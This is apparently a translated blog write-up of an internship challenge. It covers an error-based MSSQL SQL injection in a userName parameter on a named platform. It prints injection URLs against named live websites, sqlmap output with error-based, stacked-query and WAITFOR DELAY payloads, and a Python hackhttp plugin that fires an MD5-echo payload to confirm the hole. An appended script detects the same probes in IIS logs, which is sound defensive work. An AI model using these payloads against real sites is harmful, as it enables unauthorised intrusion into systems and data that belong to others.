Recently Clover (四叶草) started recruiting interns again, so a certain girl sent in her résumé. Before long Clover sent over a problem for her to complete. So? What does this mean? It means a great chance to chat up a girl has just arrived. Hahaha……

Let's take a look at the problem:

A widely used platform has been reported to have a high-risk injection; the details are as follows:

http://www.exploit.com/livefiles/pages/inner/userlist.aspx?ModuleType=Friends&RelatedUserType=Friends&UserModuleClientID=ctl00_ctl00_TemplateHolder_ContentHolder_ctl06&userName=1

The userName parameter is an error-based injection point.

Write a generic Python script that detects this injection point (any Python library may be used).
The script must be tested against multiple target sites.
Two test sites follow (do not perform any dangerous action beyond testing):

http://www.jmsyzx.com/
http://www.globechildren.com/

Whoa, no restriction on Python libraries, and a generic script. Having just played a few rounds of Overwatch with my roommate (it's pretty fun, come join us if you're interested), I was completely baffled at first glance. In short, I overthought it at the start, but really it is just a matter of writing a plugin (it was range who whacked me awake with a stick, so from now on I'll finish the real work before gaming).

A quick look shows it's an MSSQL database and the injection is error-based. We can craft a request by hand to see the database type:

http://www.jmsyzx.com/livefiles/pages/inner/userlist.aspx?ModuleType=Friends&RelatedUserType=Friends&UserModuleClientID=ctl00_ctl00_TemplateHolder_ContentHolder_ctl06&userName=1%27%20and%201=@@version--

We can also run sqlmap and take a look:

[22:07:32] [INFO] resuming back-end DBMS 'microsoft sql server'
[22:07:32] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: userName (GET)
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: ModuleType=Friends&RelatedUserType=Friends&UserModuleClientID=ctl00_ctl00_TemplateHolder_ContentHolder_ctl06&userName=1' AND 2390=CONVERT(INT,(SELECT CHAR(113)+CHAR(107)+CHAR(98)+CHAR(113)+CHAR(113)+(SELECT (CASE WHEN (2390=2390) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(98)+CHAR(112)+CHAR(118)+CHAR(113))) AND 'nTAv'='nTAv
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries (comment)
Payload: ModuleType=Friends&RelatedUserType=Friends&UserModuleClientID=ctl00_ctl00_TemplateHolder_ContentHolder_ctl06&userName=1';WAITFOR DELAY '0:0:5'--
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind (comment)
Payload: ModuleType=Friends&RelatedUserType=Friends&UserModuleClientID=ctl00_ctl00_TemplateHolder_ContentHolder_ctl06&userName=1' WAITFOR DELAY '0:0:5'--
---
[22:07:33] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2008 R2 or 7
web application technology: ASP.NET, Microsoft IIS 7.5
back-end DBMS: Microsoft SQL Server 2005
[22:07:33] [INFO] fetched data logged to text files under 'C:\Users\ZEROYU\.sqlmap\output\www.jmsyzx.com'

Don't read too much into it, just look at that GET; GET is the simplest case.
We only need to grab two things: the error, and getting the MD5 printed.

To print the MD5, MSSQL offers two ways:

1.http://www.jmsyzx.com/livefiles/pages/inner/userlist.aspx?ModuleType=Friends&RelatedUserType=Friends&UserModuleClientID=ctl00_ctl00_TemplateHolder_ContentHolder_ctl06&userName=1%27%20and%201=sys.fn_sqlvarbasetostr(HashBytes(%27MD5%27,%27123456%27))--
2.http://www.jmsyzx.com/livefiles/pages/inner/userlist.aspx?ModuleType=Friends&RelatedUserType=Friends&UserModuleClientID=ctl00_ctl00_TemplateHolder_ContentHolder_ctl06&userName=1%27%20and%201=sys.fn_varbintohexstr(hashbytes(%27MD5%27,%271234%27))--

Straight to the script I wrote:

#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
POC Name : For girl-chasing only
Author : zeroyu
mail : zeroyu.xyz@gmail.com
"""
import hackhttp
import time


def assign(service, arg):
    # Plugin entry point: only claim the target when the service tag matches
    if service == 'fingerprint.girl':
        return True, arg


def audit(arg):
    # Error-based payload: make the database evaluate HashBytes('MD5', '1234')
    # and echo the hex result inside its error message
    payload = "/livefiles/pages/inner/userlist.aspx?ModuleType=Friends&RelatedUserType=Friends&UserModuleClientID=ctl00_ctl00_TemplateHolder_ContentHolder_ctl06&userName=1%27%20and%201=sys.fn_varbintohexstr(hashbytes(%27MD5%27,%271234%27))--"
    url = arg + payload
    code, head, res, errcode, _ = hackhttp.http(url)
    time.sleep(1)
    # A 500 whose body contains the MD5 hex of '1234' proves the expression ran in the DB
    if code == 500 and '81dc9bdb52d04dc20036dbd8313ed055' in res:
        security_hole(url)


if __name__ == '__main__':
    from dummy import *  # local stub that provides security_hole() outside the scanner
    audit(assign('fingerprint.girl', 'http://www.jmsyzx.com/')[1])

Wondering what the hackhttp library is? Go read its docs.
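As an added example (not part of the post, and not the author's hackhttp plugin), here is the same problem seen from the defender's side: a Python 3 script that walks IIS W3C access-log lines, percent-decodes each query parameter and flags the probe shapes that appear above (the manual `@@version` check, the `HashBytes`/`fn_varbintohexstr`/`fn_sqlvarbasetostr` MD5 oracle, sqlmap's `CONVERT(INT,...)` error-based and `WAITFOR DELAY` time-based payloads), escalating the verdict when the request also drew a 500. It also reports the edge case the write-up's oracle depends on: a lone quote in a value that produces a 500 with no SQL keyword at all. The log lines, IP addresses and field layout are constructed for the example; `scan_log`, `classify_query` and the signature names are my own.

```python
#!/usr/bin/env python3
"""Flag error-based SQLi probes against userlist.aspx in IIS W3C access-log text."""
import re
from urllib.parse import unquote_plus

# Signatures derived from the probes shown in the write-up, matched case-insensitively
PROBE_SIGNATURES = {
    "version_probe": re.compile(r"@@version", re.I),
    "md5_oracle": re.compile(r"fn_(?:varbintohexstr|sqlvarbasetostr)\s*\(\s*hashbytes\s*\(", re.I),
    "convert_error": re.compile(r"convert\s*\(\s*int\s*,", re.I),
    "time_delay": re.compile(r"waitfor\s+delay", re.I),
}
# Generic shape of all of the above: a closing quote, a boolean operator or statement
# terminator, and a trailing comment that swallows the rest of the original query
GENERIC_SHAPE = re.compile(r"'\s*(?:and|or|;).*(?:--|/\*)", re.I | re.S)

# Constructed W3C layout used by the sample below (not a real server's log)
FIELDS = ["date", "time", "s-ip", "cs-method", "cs-uri-stem", "cs-uri-query",
          "s-port", "cs-username", "c-ip", "cs(User-Agent)", "sc-status"]

# Constructed sample: one normal request, three probes from the write-up, one real user
# whose apostrophe alone crashes the page
SAMPLE_LOG = """\
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) sc-status
2016-06-01 22:07:30 10.0.0.5 GET /livefiles/pages/inner/userlist.aspx ModuleType=Friends&userName=alice 80 - 203.0.113.9 Mozilla/5.0 200
2016-06-01 22:07:32 10.0.0.5 GET /livefiles/pages/inner/userlist.aspx ModuleType=Friends&userName=1%27%20and%201=@@version-- 80 - 203.0.113.9 Mozilla/5.0 500
2016-06-01 22:07:33 10.0.0.5 GET /livefiles/pages/inner/userlist.aspx ModuleType=Friends&userName=1%27%20and%201=sys.fn_varbintohexstr(hashbytes(%27MD5%27,%271234%27))-- 80 - 203.0.113.9 Mozilla/5.0 500
2016-06-01 22:07:34 10.0.0.5 GET /livefiles/pages/inner/userlist.aspx ModuleType=Friends&userName=1%27;WAITFOR%20DELAY%20%270:0:5%27-- 80 - 203.0.113.9 Mozilla/5.0 200
2016-06-01 22:07:40 10.0.0.5 GET /livefiles/pages/inner/userlist.aspx ModuleType=Friends&userName=O%27Brien 80 - 198.51.100.4 Mozilla/5.0 500
"""


def parse_w3c_line(line):
    """Return a field dict for one log line, or None for directives, blanks and junk."""
    if not line or line.startswith("#"):
        return None
    parts = line.split(" ")
    return dict(zip(FIELDS, parts)) if len(parts) == len(FIELDS) else None


def iter_params(query):
    """Split cs-uri-query on '&' only (never ';', which is part of stacked-query payloads)."""
    for pair in query.split("&"):
        if pair:
            key, _, raw = pair.partition("=")
            yield unquote_plus(key), unquote_plus(raw)


def classify_query(query):
    """Return (param, decoded value, tags) for the first suspicious parameter, else None."""
    for param, value in iter_params(query):
        tags = [name for name, rx in PROBE_SIGNATURES.items() if rx.search(value)]
        if GENERIC_SHAPE.search(value):
            tags.append("quote_comment_shape")
        if tags:
            return param, value, tags
    return None


def quoted_param(query):
    """First parameter whose decoded value carries a single quote, else None."""
    for param, value in iter_params(query):
        if "'" in value:
            return param, value
    return None


def scan_log(text):
    """Walk W3C log text and return one finding dict per suspicious request."""
    findings = []
    for line in text.splitlines():
        rec = parse_w3c_line(line)
        if rec is None:
            continue
        status = int(rec["sc-status"]) if rec["sc-status"].isdigit() else 0
        query = rec["cs-uri-query"]
        hit = classify_query(query)
        if hit:
            param, value, tags = hit
            # A 500 on a probe means the injected expression reached the DB engine,
            # which is exactly the oracle the write-up's script keys on
            verdict = "probe_with_db_error" if status == 500 else "probe"
        elif status == 500 and quoted_param(query):
            # No SQL keyword, but a lone quote produced a server error: the page is
            # likely building SQL by string concatenation and deserves a review
            param, value = quoted_param(query)
            tags, verdict = [], "quote_triggered_error"
        else:
            continue
        findings.append({"time": rec["time"], "client": rec["c-ip"], "stem": rec["cs-uri-stem"],
                         "param": param, "value": value, "tags": tags, "verdict": verdict})
    return findings


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"{f['time']} {f['client']:<14} {f['verdict']:<22} {f['param']}={f['value']!r} {','.join(f['tags'])}")
```

Splitting the query string by hand instead of using `urllib.parse.parse_qs` matters here: older Python versions also treated `;` as a separator, which would chop the `1';WAITFOR DELAY ...` payload in two and hide the `time_delay` signature. The `quote_triggered_error` verdict is the one to act on first, since it shows the underlying query construction is fragile before any attacker has confirmed it.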

OK, that's enough girl-chasing for today.